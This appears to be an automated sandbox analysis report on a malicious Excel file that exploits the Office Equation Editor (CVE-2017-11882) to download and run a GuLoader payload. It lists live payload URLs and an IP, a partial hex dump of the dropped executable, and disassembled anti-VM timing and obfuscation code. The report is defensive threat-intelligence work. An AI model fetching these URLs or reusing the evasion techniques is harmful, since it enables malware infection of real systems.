Windows Analysis Report destinations.xlsx

Overview

General Information

Sample Name:	destinations.xlsx
Analysis ID:	502631
MD5:	a4bb01370caeb6363f6dc7923585481e
SHA1:	3eff08923d9b179edcc99fe52d95a46755eac939
SHA256:	c45eacade4845c8cf141724b92d6fd4401d30233b18b17e295d2d7a9a8944c40
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: File Dropped By EQNEDT32EXE

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Yara detected GuLoader

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sigma detected: Execution from Suspicious Folder

Office equation editor drops PE file

Tries to detect virtualization through RDTSC time measurements

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Drops PE files to the user root directory

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to call native functions

Downloads executable code via HTTP

Contains functionality for execution timing, often used to detect debuggers

Abnormal high CPU Usage

Potential document exploit detected (unknown TCP traffic)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Office Equation Editor has been started

Drops PE files to the user directory

Potential document exploit detected (performs HTTP gets)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Creates a process in suspended mode (likely to inject code)

Classification

Signatures

AV Detection:

Found malware configuration

Source: 00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://implantecapilarpereira.com/NetGen"}

Antivirus detection for URL or domain

Source: http://192.3.121.153/00800800/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 27%			Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 27%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.3.121.153:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.3.121.153:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 44MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://implantecapilarpereira.com/NetGen

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 14 Oct 2021 05:37:49 GMTServer: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.3.31Last-Modified: Wed, 13 Oct 2021 14:42:26 GMTETag: "33000-5ce3cf88aac57"Accept-Ranges: bytesContent-Length: 208896Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d7 69 c6 c2 93 08 a8 91 93 08 a8 91 93 08 a8 91 10 14 a6 91 92 08 a8 91 dc 2a a1 91 9b 08 a8 91 a5 2e a5 91 92 08 a8 91 52 69 63 68 93 08 a8 91 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 f7 ea 52 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 e0 02 00 00 50 00 00 00 00 00 00 7c 13 00 00 00 10 00 00 00 f0 02 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 40 03 00 00 10 00 00 ea 02 04 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 24 e0 02 00 28 00 00 00 00 10 03 00 26 25 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 00 20 00 00 00 00 10 00 00 0c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 d4 02 00 00 10 00 00 00 e0 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 ec 13 00 00 00 f0 02 00 00 10 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 26 25 00 00 00 10 03 00 00 30 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 c3 1f b0 49 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /00800800/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.121.153Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153

Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: vbc.exe, 00000004.00000002.672041405.00000000032C7000.00000002.00020000.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5D127D2C.emf

Jump to behavior

Source: global traffic

System Summary:

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A557A	4_2_002A557A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B474A	4_2_002B474A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002AE400	4_2_002AE400
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A087E	4_2_002A087E
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B00B4	4_2_002B00B4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A00C6	4_2_002A00C6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002AECDD	4_2_002AECDD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A7574	4_2_002A7574
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00294AA2	4_2_00294AA2
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B130A	4_2_002B130A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A4B8B	4_2_002A4B8B
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A6BF6	4_2_002A6BF6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B1BCE	4_2_002B1BCE

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 4_2_002A557A NtAllocateVirtualMemory,

4_2_002A557A

Abnormal high CPU Usage

Source: C:\Users\Public\vbc.exe

Process Stats: CPU usage > 98%

PE file contains strange resources

Source: vbc[1].exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.2.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write			Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write			Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$destinations.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRDE0E.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@4/15@0/1

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Source: Yara match

File source: 00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmp, type: MEMORY

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041A474 push ebp; ret	4_2_0041A4CD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040E9CB push ecx; retf	4_2_0040E9CC
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004191F0 push ecx; ret	4_2_004191F1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004131A3 push ecx; ret	4_2_004132DD
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004086CE push eax; retf	4_2_004086CF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00411ACE push ecx; ret	4_2_00411B05
Source: C:\Users\Public\vbc.exe	Code function: 4_2_004132DE push ecx; ret	4_2_0041331D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0041729D push edx; retf	4_2_004172A6
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040DAAA push ecx; ret	4_2_0040DAD5
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040E6B3 push ecx; ret	4_2_0040E6C1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00417AB9 push eax; ret	4_2_00417AC3
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0040A750 push ss; retf	4_2_0040A751
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00411B06 push ecx; ret	4_2_00411B05
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00407B81 push esi; retf	4_2_00407B83
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B4084 push FFFFFF94h; retf	4_2_00292B65
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00291611 push esi; iretd	4_2_0029167D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00292A10 push FFFFFF94h; retf	4_2_00292B65
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0029465A push ebx; retf	4_2_00294661
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00291327 push esi; iretd	4_2_0029167D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00291366 push esi; iretd	4_2_0029167D
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002967BC push es; ret	4_2_002967F4
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A6BF6 push FFFFFF94h; retf	4_2_00292B65

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 00000000002AF8E2 second address: 00000000002AF8E2 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 3AB33088h 0x00000007 sub eax, 03336DF3h 0x0000000c xor eax, 78D04D3Fh 0x00000011 xor eax, 4FAF8FABh 0x00000016 cpuid 0x00000018 popad 0x00000019 jmp 00007F9204BA6819h 0x0000001e cmp eax, edx 0x00000020 call 00007F9204BA66EAh 0x00000025 lfence 0x00000028 mov edx, 337D36F1h 0x0000002d xor edx, 66E5A0A3h 0x00000033 xor edx, 9D6B538Dh 0x00000039 xor edx, B70DC5CBh 0x0000003f mov edx, dword ptr [edx] 0x00000041 lfence 0x00000044 jmp 00007F9204BA681Dh 0x00000049 test cl, bl 0x0000004b ret 0x0000004c sub edx, esi 0x0000004e ret 0x0000004f add edi, edx 0x00000051 dec dword ptr [ebp+000000F8h] 0x00000057 cmp dword ptr [ebp+000000F8h], 00000000h 0x0000005e jne 00007F9204BA66CCh 0x00000060 call 00007F9204BA685Fh 0x00000065 call 00007F9204BA6846h 0x0000006a lfence 0x0000006d mov edx, 337D36F1h 0x00000072 xor edx, 66E5A0A3h 0x00000078 xor edx, 9D6B538Dh 0x0000007e xor edx, B70DC5CBh 0x00000084 mov edx, dword ptr [edx] 0x00000086 lfence 0x00000089 jmp 00007F9204BA681Dh 0x0000008e test cl, bl 0x00000090 ret 0x00000091 mov esi, edx 0x00000093 pushad 0x00000094 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2844

Thread sleep time: -240000s >= -30000s

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_002AF8DA rdtsc

4_2_002AF8DA

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\Public\vbc.exe

Code function: 4_2_002AF8DA rdtsc

4_2_002AF8DA

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 4_2_002AC054 mov eax, dword ptr fs:[00000030h]	4_2_002AC054
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002AE990 mov eax, dword ptr fs:[00000030h]	4_2_002AE990
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002A46A0 mov eax, dword ptr fs:[00000030h]	4_2_002A46A0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_002B1BCE mov eax, dword ptr fs:[00000030h]	4_2_002B1BCE

Source: C:\Users\Public\vbc.exe

Code function: 4_2_002B474A RtlAddVectoredExceptionHandler,

4_2_002B474A

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'

Jump to behavior

Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000004.00000002.671672293.00000000009A0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.3.121.153	unknown	United States		36352	AS-COLOCROSSINGUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://implantecapilarpereira.com/NetGen	true	Avira URL Cloud: safe	unknown
http://192.3.121.153/00800800/vbc.exe	true	2%, Virustotal, Browse Avira URL Cloud: malware	unknown

AV Detection:

Found malware configuration

Source: 00000004.00000002.671498542.0000000000290000.00000040.00000001.sdmp

Malware Configuration Extractor: GuLoader {"Payload URL": "http://implantecapilarpereira.com/NetGen"}

Antivirus detection for URL or domain

Source: http://192.3.121.153/00800800/vbc.exe

Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Virustotal: Detection: 27%			Perma Link
Source: C:\Users\Public\vbc.exe	Virustotal: Detection: 27%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.3.121.153:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.3.121.153:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 44MB

Networking:

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://implantecapilarpereira.com/NetGen

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
Source: unknown	TCP traffic detected without corresponding DNS query: 192.3.121.153
